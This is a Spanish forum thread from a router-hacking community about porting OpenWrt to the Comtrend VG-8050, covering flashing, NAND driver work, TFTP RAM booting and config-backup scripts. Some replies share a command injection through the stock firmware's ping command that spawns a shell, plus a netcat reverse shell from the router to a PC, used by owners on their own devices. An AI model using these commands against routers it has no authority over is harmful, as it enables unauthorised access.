?>/script>'; } ?> [Desarrollo] OpenWrt en Comtrend VG-8050 Widgets Magazine

Autor Tema: [Desarrollo] OpenWrt en Comtrend VG-8050  (Leído 58722 veces)

0 Usuarios y 1 Visitante están viendo este tema.

backglass

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #40 en: 28-08-2015, 19:24 (Viernes) »
Firmwares Originales de Movistar (sin bootloader CFE)
VG-8050-SB01-S412TLF-C08_R10
Buenas,

Me gustaría saber si el firmware original se puede flashear directamente a través de http://192.168.1.1/upload.html

o siguiendo el procedimiento descrito en la wiki del router:

Código: [Seleccionar]
Flashing ANY Firmware

You must set your TCP/IP v4 protocol to:

    IP: 192.168.1.2
    Netmask: 255.255.255.0
    Gateway: 192.168.1.1
    DNS: (optional, can be blank).

Then:

    Power off the router.
    Press reset button near the antenna.
    Keep it pressed while powering up during ~20+ seconds.
    Acces to http://192.168.1.1 and upload binary file.
    Wait until router reboots.


Saludos
« Última modificación: 28-08-2015, 19:28 (Viernes) por backglass »

jema

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #41 en: 04-09-2015, 13:41 (Viernes) »
Hola...

¿Alguien tiene el firmware original SB01-S412TLF-C08_R08 ?
Me gustaría probar la opción de TV Services (DLNA) de los canales de movistar Tv. En la última lo han quitado del menú de configuración.

¿Es posible que se pueda acceder a esa configuración directamente (algo así como 192.168.1.1/tvservices.html) ???

Gracias



Algún crack podría contestarme....
Gracias chicos

Pteridium

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #42 en: 04-09-2015, 15:22 (Viernes) »
Hola...

¿Alguien tiene el firmware original SB01-S412TLF-C08_R08 ?
Me gustaría probar la opción de TV Services (DLNA) de los canales de movistar Tv. En la última lo han quitado del menú de configuración.

¿Es posible que se pueda acceder a esa configuración directamente (algo así como 192.168.1.1/tvservices.html) ???

Gracias



Algún crack podría contestarme....
Gracias chicos

Este subforo está dedicado a OpenWRT. Para consultas sobre los firms originales de los routers hay muchos otros foros y wikis que tratan esos temas.

lopz_

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #43 en: 20-11-2015, 22:26 (Viernes) »
Buenas, estimados cracks del foro....

¿este tema sigue parado no? o se ha logrado algo.... Tengo este router en casa me gustaría poder meterle openwrt, hacerle el USBMOD, y poder sacarle de verdad provecho, (ya que me ocupa medio mueble) que por lo menos lo valga jaja.

Salu2

farconada

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #44 en: 07-01-2016, 10:52 (Jueves) »
A mi también me gustaría saber como esta el tema, tengo ese trasto en casa y aunque tengo pensando comprarme un WDR4300 me gustaría poder sacarle algo de partido al VG-8050

Noltari

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #45 en: 15-01-2016, 12:40 (Viernes) »
Buenas, estimados cracks del foro....

¿este tema sigue parado no? o se ha logrado algo.... Tengo este router en casa me gustaría poder meterle openwrt, hacerle el USBMOD, y poder sacarle de verdad provecho, (ya que me ocupa medio mueble) que por lo menos lo valga jaja.

Salu2

A mi también me gustaría saber como esta el tema, tengo ese trasto en casa y aunque tengo pensando comprarme un WDR4300 me gustaría poder sacarle algo de partido al VG-8050

Buenas,

Pues el único progreso que he conseguido hacer últimamente es que funcione la interrupción para leer/escribir en la NAND, por lo que ya no hay que hacer polling.

Por si alguien le quiere echar un ojo está en la rama bmips-devel de mi repositorio en Github:
https://github.com/openwrt-es/openwrt/tree/bmips-devel/target/linux/bmips
Aun así, faltaría conseguir crear un firmware compatible con la estructura adecuada para la NAND, que es un poco extraña.
Este paso es bastante crítico, ya que hacerlo mal implica quedarnos con un pisapapeles bastante grande, puesto que en el firmware ha de ir incluido un second-stage CFE.

Por otro lado, también conseguí que funcionara el switch. Para el que lo quiera probar, lo tiene disponible en la rama brcm63xx-devel de mi repositorio:
https://github.com/openwrt-es/openwrt/tree/brcm63xx-devel/target/linux/brcm63xx

P.D: son pequeños avances que se van haciendo, pero no por ello menos importantes.
Hay que tener en cuenta que nunca ha habido ningún router con NAND en la plataforma BCM63xx y la estructura utilizada por Broadcom no ayuda en absoluto.

Saludos!

Desconectado Tki2000

  • Moderador
  • *
  • Mensajes: 2247
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #46 en: 15-01-2016, 13:46 (Viernes) »
P.D: son pequeños avances que se van haciendo, pero no por ello menos importantes.

Las cosas siempre son sencillas.
Lo difícil es, que hacerlo sencillo, muchas veces, es muy complicado.

Tak-MK

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #47 en: 03-05-2016, 12:47 (Martes) »

Hace unos pocos días Movistar ha actualizado automáticamente el firmware del router a la versión C08_R10.

Código: [Seleccionar]
Device Info
Board ID: 963169P-1861N5
Software Version: SB01-S412TLF-C08_R10
Bootloader (CFE) Version: 1.0.38-112.70-14
Wireless Driver Version: 6.30.102.7.cpe4.12L04.1

El "truco" para conseguir una shell ya no funciona:

Código: [Seleccionar]
> ping echo `/bin/sh > /dev/tty`
Warning: operator ` is not supported!

Seguramente la solución del error haya venido de Comtrend y no de Movistar...

Saludos!

Me he registrado prácticamente para responder esto.

Podéis sustituir la función que hacen las `` por los actuales $(); a mí me ha funcionado.
Código: [Seleccionar]
ping echo $(/bin/sh > /dev/tty)
¡Saludos!
« Última modificación: 03-05-2016, 12:49 (Martes) por Tak-MK »

gadLinux

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #48 en: 21-08-2016, 19:36 (Domingo) »
¿Cómo lo véis? ¿Chungo?

La verdad es que el router tiene muy buena pinta. Con el mod de USB, las 128MB ram y el switch dedicado ethernet parece una joyita. Yo lo quiero para OpenFlow y sería la leche poder arrancar openwrt.

Por lo que he visto, hay conexión con la NAND y el switch. ¿Qué faltaría para el soporte completo de OpenWRT?

quiqueal

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #49 en: 22-08-2016, 21:40 (Lunes) »

Hace unos pocos días Movistar ha actualizado automáticamente el firmware del router a la versión C08_R10.

Código: [Seleccionar]
Device Info
Board ID: 963169P-1861N5
Software Version: SB01-S412TLF-C08_R10
Bootloader (CFE) Version: 1.0.38-112.70-14
Wireless Driver Version: 6.30.102.7.cpe4.12L04.1

El "truco" para conseguir una shell ya no funciona:

Código: [Seleccionar]
> ping echo `/bin/sh > /dev/tty`
Warning: operator ` is not supported!

Seguramente la solución del error haya venido de Comtrend y no de Movistar...

Saludos!

Me he registrado prácticamente para responder esto.

Podéis sustituir la función que hacen las `` por los actuales $(); a mí me ha funcionado.
Código: [Seleccionar]
ping echo $(/bin/sh > /dev/tty)
¡Saludos!
¿Ha alguien se le ocurre un forma de lanzar una segunda instancia de telnet ssh que arranque el shel directamente?

Con el método propuesto, funciona pero hay un temporizador muy molesto.

quiqueal

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #50 en: 23-08-2016, 23:14 (Martes) »
He encontrado una solución intermedia. Haciendo un reverse shell con:

Ejecutando esto en el ordenador
nc -Lvp 9998 -s 0.0.0.0  para la salida
nc -Lvp 9999 -s 0.0.0.0 para la entrada

Y esto en el router con la shell iniciada mediante ping echo $(/bin/sh > /dev/tty)

nc ip_ordenador 9998 | sh | nc ip_ordenador 9999

Así se puede investigar mas tranquilamente aunque al final la conexión temporiza.

tiagorl

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #51 en: 06-10-2016, 17:09 (Jueves) »
¿Teneis el SB01-S412TLF-C09_R03?

Un saludo


lucho

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #52 en: 06-12-2016, 09:31 (Martes) »
Buenas compis, entiendo que aún no se puede instalar openWRT en este cacharro, pero ¿se pueden probar algunas cosillas? ¿Como hago para probar las cositas que Noltari ha conseguido? (ya tengo clonado el repo de github)

Muchas gracias.
Un saludo.

danitool

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #53 en: 06-12-2016, 14:25 (Martes) »
Buenas compis, entiendo que aún no se puede instalar openWRT en este cacharro, pero ¿se pueden probar algunas cosillas? ¿Como hago para probar las cositas que Noltari ha conseguido? (ya tengo clonado el repo de github)

Muchas gracias.
Un saludo.

Me imagino que has de compilar un firmware RAM, de esta forma se carga todo el sistema en RAM sin tocar la flash. Tendrías un Openwrt totalmente funcional, pero en cuanto apagases el router tendrías que volver a cargarlo en RAM manualmente. Para cargar manualmente un firmware RAM en CFE necesitas acceso por puerto serie para meterle el comando
Código: [Seleccionar]
r 192.168.1.35:firmware-RAM.elfy un servidor tftp en tu PC (en este caso con la ip 192.168.1.35) para que CFE coja ese firmware RAM de ahí

Si el CFE que trae tiene las opciones habituales, podrías especificarle que cargue siempre el sistema via TFTP. Así teniendo un servidor TFTP permanentemente activo en tu red, arrancaría siempre con Openwrt, eso sí en principio no guardaría cambios ni configuraciones. Tendrías que compilar el firmware ya configurado si es que lo quisieses para algún propósito específico. Ignoro si se podría montar la NAND con una particion para guardar paquetes y configuraciones, supongo que sí. Sería desde luego una forma bastante geek para usar el router con Openwrt

Poco más puedo decir, ya que no dispongo de este router ni ningún otro con este SoC (BCM63168).


lucho

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #54 en: 06-12-2016, 20:07 (Martes) »
Muchas gracias danitool, creo que aun me quedan muchas cosas por aprender antes de poder hacer lo que comentas. Buscando más  información sobre el soc he encontrado esto:

https://wiki.openwrt.org/doc/hardware/soc/soc.broadcom.bcm63xx

Aquí se comenta que con la versión de kernel 4.2 ya hay soporte para flash NAND... si he entendido bien creo que ya se podría almacenar algo de info en el chip... creo que este era uno de los problemas que tenía Noltari en su parche... pero no tengo mucha idea... igual me lo he imaginado.@Noltari, ¿algo de luz sobre este tema?

Muchas gracias.

rgallosog

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #55 en: 15-02-2017, 16:20 (Miércoles) »
Buenas, respecto a este tema yo ya llevo utilizándolo bastante tiempo como el core/fw de la red de mi casa y lo que he hecho es compilarlo con una configuración preestablecida y una carpeta en la raíz /confiscr que contiene dos scripts: getconfig.sh y putconfig.sh. Luego en la configuración inicial de la que hablo en el archivo rc.local esta añadido sh /confiscr/getconfig.sh y en el crontap está que cada 30 min ejecute el script /confiscr/putconfig.sh, De este modo cada 30 min se salva la última configuración al tftp sobrescribiendo la anterior y cuando el router inicia aplica la última config que está en el tftp.

rgallosog

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #56 en: 15-02-2017, 16:47 (Miércoles) »
confget:

#!/bin/sh
tftp {ip} -g -r etc.tar.gz -l /tmp/etc.tar.gz
tar xzvf /tmp/etc.tar.gz -C /
rm /tmp/etc.tar.gz
sleep 3
ntfs-3g /dev/sda1 /mnt/
/etc/init.d/network restart
sleep 5
/etc/init.d/firewall restart
/etc/init.d/dnsmasq restart
/etc/init.d/uhttpd restart
/etc/init.d/ddns restart
/etc/init.d/cron restart
/etc/init.d/collectd restart
/etc/init.d/dropbear restart
/etc/init.d/led restart
/etc/init.d/luci_statistics restart
/etc/init.d/qos restart
/etc/init.d/tinyproxy restart
/etc/init.d/vnstat restart
/etc/init.d/transmission restart
/etc/init.d/rpcd restart
/etc/init.d/sysntpd restart


confput:

#!/bin/sh
sysupgrade -l > /tmp/listsave.dat
#tar czvfp /tmp/etc.tar.gz /etc/
tar czvfp /tmp/etc.tar.gz -T /tmp/listsave.dat
tftp 192.168.2.169 -p -l /tmp/etc.tar.gz -r etc.tar.gz
rm /tmp/etc.tar.gz
rm /tmp/listsave.dat

rc.local

# Put your custom commands here that should be executed once
# the system init finished. By default this file does nothing.
#ntfs-3g /dev/sda1 /mnt/
sh /confsh/confget.sh
exit 0

crontab:

*/30 * * * * sh /confsh/confsave.sh

lucho

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #57 en: 18-02-2017, 07:40 (Sábado) »
Muchas gracias rgallosog.

Hice varias pruebas tratando de compilar alguno de los firmwares por defecto y no conseguí que ninguno terminara de compilar... tengo que retomar el tema y probar de nuevo. Soy bastante newbie en este tema.

¿No tendrás el fichero de configuración que usaste para compilarlo?

Muchas gracias!!!

rgallosog

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #58 en: 18-02-2017, 22:57 (Sábado) »
Buenas, adjunto link de descarga con mi .config, tambien he añadido un compilado (vmlinux) para ram y algunas notas.
Es probable que no te sirva mi .config poque yo lo que he hecho es descargarme las fuentes de Noltari y la última versión de las de OPENWRT del sitio oficial y he adaptado el target desde las fuentes de Noltari a estas. Los cambios necesarios son pocos y es lo que yo te recomiendo que hagas. Si esperas unos días intento hacer algun manual de los cambios a hacer para adaptar el target porque me tomo algunas horas la verdad y cometí el error de no documentarlo, no es un simple copia y pega ya que han cambiado algunas llamadas.
SALUDOS Y ESPERO FUNCIONE

https://mega.nz/#!XhlS2YSR!X8NzsgnvNDVd7xAMC27vjDMU2ZEjHcO-BqwcGc1TkAg
« Última modificación: 28-02-2017, 14:14 (Martes) por rgallosog »

rgallosog

  • Visitante
Re: [Desarrollo] OpenWrt en Comtrend VG-8050
« Respuesta #59 en: 28-02-2017, 13:28 (Martes) »
Buenas, lo siento pero no he tenido tiempo para detallar todos los cambios, así que añado link de descarga con mi carpeta target completa y un manual para utilizarla, el manual está orientado a alguien que nunca ha compilado OpenWrt si ya tienes conocimientos mínimos no es necesario, para ver todos los detalles que cambian hacer un “diff” de target/ ya sea de la fuentes de Noltari o las oficiales.

Un saludo y espero funcione.



https://mega.nz/#!D9kyASLA!e1g4L0TrI_OeFU4AhFOP3VAEW6MFG5LNRWZAdsQ3Hlo